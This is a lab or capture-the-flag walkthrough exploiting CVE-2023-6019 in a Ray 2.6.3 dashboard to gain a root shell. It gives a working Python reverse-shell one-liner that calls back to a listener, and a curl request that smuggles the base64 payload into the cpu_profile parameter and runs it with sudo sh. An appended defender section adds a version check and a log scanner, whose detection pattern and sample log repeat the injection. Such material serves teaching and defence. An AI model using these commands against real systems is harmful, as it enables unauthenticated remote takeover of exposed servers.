Enumeration

Nmap

The initial nmap scan showed that SSH and the non-standard port 9000 were open.

[Screenshot: nmap scan output]

Web Enumeration

The web service on port 9000 was a Ray 2.6.3 dashboard. I found the version at the /#/cluster/info endpoint.

[Screenshot: Ray version shown at /#/cluster/info]

Exploitation to Root

CVE-2023-6019

A command injection in Ray's cpu_profile URL parameter allowed attackers to execute OS commands on the system running the Ray dashboard, remotely and without authentication. The issue is fixed in version 2.8.1 and later. The Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023

The installed version was vulnerable to this command injection. After some research I found that the following commands give RCE.

  1. Create the payload: replace LHOST and LPORT with your listener's IP and port, then base64-encode the command:
    echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"LHOST\", LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" | base64 | tr -d '\n'

  2. Replace <PAYLOAD> and <TARGET_IP> in the request, then run curl:
    curl 'http://192.168.157.37:9000/worker/cpu_profile?pid=3354&ip=<TARGET_IP>&duration=5&native=0&format=`echo%20<PAYLOAD>%20|base64$IFS-d|sudo%20sh`'

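From the defender's side, the two facts above (Ray releases below 2.8.1 are affected, and the injection rides in the query string of /worker/cpu_profile) translate directly into checks. The following Python is an added example, not code from this writeup or from the Ray project: it compares a version string from the dashboard against the fixed release and scans a web server access log in front of the dashboard for cpu_profile requests whose parameters carry shell metacharacters. The log lines, the IP addresses and the PAYLOAD_B64 placeholder are constructed for the example; the log format assumed is the common/combined format with the request line in quotes.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Added example (not from the writeup): two defender-side checks for CVE-2023-6019.
# 1) compare a Ray version string against the fixed release 2.8.1 named in the post,
# 2) flag dashboard access-log requests to /worker/cpu_profile whose query values
#    carry shell metacharacters of the kind the exploit request relies on.

FIXED_VERSION = (2, 8, 1)  # the release the writeup says contains the fix


def parse_version(version: str) -> tuple:
    """Turn '2.6.3' into (2, 6, 3); stops at the first non-numeric component."""
    parts = []
    for piece in version.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def is_vulnerable_version(version: str) -> bool:
    """True when the dashboard reports a Ray release older than 2.8.1."""
    return parse_version(version) < FIXED_VERSION


# Characters and tokens that never belong in a profiler query value but are
# needed for the injection: backticks, $(), pipes, $IFS, decoders and shells.
SUSPICIOUS = re.compile(r"[`;|&]|\$\(|\$IFS|base64|\bsudo\b|\bsh\b|\bbash\b", re.IGNORECASE)

# Common/combined log format request line, e.g. "GET /path?x=1 HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target: str) -> Optional[dict]:
    """Return {param: decoded value} for suspicious cpu_profile parameters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/worker/cpu_profile"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    hits = {}
    for name, values in params.items():
        for value in values:
            if SUSPICIOUS.search(value):
                hits[name] = value
    return hits or None


def scan_access_log(lines) -> list:
    """Scan log lines and return one finding per request that looks like injection."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hit = inspect_request(match.group("target"))
        if hit:
            findings.append({"line": line, "params": hit})
    return findings


# Constructed sample log lines (not real traffic): one legitimate profile request,
# one unrelated request, and one carrying a backtick-wrapped command in `format`.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /worker/cpu_profile?pid=3354&ip=10.0.0.9&duration=5&native=0&format=flamegraph HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /api/cluster_status HTTP/1.1" 200 812',
    '10.0.0.8 - - [01/Jan/2024:10:00:09 +0000] "GET /worker/cpu_profile?pid=3354&ip=10.0.0.9&duration=5&native=0&format=`echo%20PAYLOAD_B64%20|base64$IFS-d|sudo%20sh` HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print("2.6.3 vulnerable:", is_vulnerable_version("2.6.3"))
    for finding in scan_access_log(SAMPLE_LOG):
        print("suspicious cpu_profile request:", finding["params"])
```

The version check is the quick triage step (the same /#/cluster/info value the writeup reads tells you whether the dashboard is below 2.8.1), while the log scan gives you a retrospective signal for hosts that were exposed before patching. Upgrading past 2.8.1 and keeping the dashboard off untrusted networks remain the actual fix; the scan only tells you whether someone already tried.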

[Screenshot: exploit request]

This returned a root shell.

[Screenshot: root shell]

